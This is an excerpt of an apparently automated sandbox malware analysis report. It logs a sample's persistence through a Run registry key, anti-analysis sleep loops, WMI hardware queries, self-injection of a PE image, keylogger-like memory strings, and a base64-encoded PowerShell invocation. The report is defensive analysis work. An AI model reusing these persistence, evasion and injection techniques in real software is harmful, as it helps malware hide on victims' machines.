                Source: C:\Users\user\Desktop\file.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Qasvjoldkyh

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | File opened: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\Desktop\file.exe TID: 5084 Thread sleep time: -25825441703193356s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 3848 Thread sleep count: 9732 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2120 Thread sleep time: -11990383647911201s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 4688 Thread sleep count: 9481 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -11990383647911201s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1200000s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1199875s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1199624s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1199498s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1199344s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1199203s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1199047s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1198938s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1198794s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1198680s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1198547s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1198420s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1198297s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1198170s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1198031s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1197921s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1197797s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1197671s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1197536s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1197391s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1197265s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1197152s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1196956s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1196797s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1196679s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1196547s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1196250s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1196094s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1195921s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1195809s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1195688s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1195547s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1195436s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1195328s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1195200s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1195076s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792 Thread sleep time: -1194953s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194844s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194734s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194625s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194515s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194406s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194297s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194187s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1194077s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1193969s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1193844s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1193733s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1792Thread sleep time: -1193623s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 6044Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 6044Thread sleep count: 36 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 6020Thread sleep count: 9624 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 1592Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 1592Thread sleep count: 43 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 5984Thread sleep count: 9758 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 4984Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 4984Thread sleep count: 40 > 30
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 5388Thread sleep count: 9746 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5040Thread sleep time: -15679732462653109s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 996Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 2980Thread sleep time: -21213755684765971s >= -30000s
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 2980Thread sleep count: 38 > 30
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 1668Thread sleep count: 9716 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5892Thread sleep time: -19369081277395017s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 836Thread sleep count: 844 > 30
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -11990383647911201s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1200000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1199662s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1199537s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1199405s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1199200s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1198760s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1198310s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1197900s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1197786s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1197349s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1196761s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1196360s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1196005s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1195758s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1195505s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1194897s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1194753s >= -30000s
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe TID: 2040Thread sleep time: -1194348s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1200000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199875Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199624Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199498Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199344Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199203Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1199047Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198938Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198794Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198680Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198547Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198420Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198297Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198170Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1198031Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197921Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197797Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197671Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197536Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197391Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197265Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1197152Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196956Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196797Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196679Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196547Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196250Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1196094Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195921Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195809Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195688Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195547Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195436Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195328Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195200Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1195076Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194953Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194844Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194734Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194625Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194515Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194406Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194297Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194187Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1194077Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193969Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193844Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193733Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 1193623Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1200000
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199662
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199537
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199405
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1199200
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1198760
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1198310
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1197900
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1197786
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1197349
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1196761
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1196360
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1196005
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1195758
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1195505
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1194897
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1194753
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeThread delayed: delay time: 1194348
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 9732Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9388Jump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 9481Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWindow / User API: threadDelayed 9624Jump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeWindow / User API: threadDelayed 9758Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWindow / User API: threadDelayed 9746
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8218
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeWindow / User API: threadDelayed 9716
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9319
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWindow / User API: threadDelayed 844
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
Source: Qasvjoldkyh.exe, 0000000F.00000002.566195369.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8j
Source: file.exe, 00000004.00000003.396945802.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000002.609344708.00000000010AA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\file.exeProcess created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: Base64 decoded start-sleep -seconds 20
                Source: C:\Users\user\Desktop\file.exeProcess created: Base64 decoded start-sleep -seconds 20Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess created: Base64 decoded start-sleep -seconds 20Jump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: Base64 decoded start-sleep -seconds 20Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeMemory written: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeMemory written: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Process created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Process created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000004.00000002.618527573.0000000002D15000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}{Win}r{Win}
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}{Win}
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}{Win}r{Win}r
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}{Win}r
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
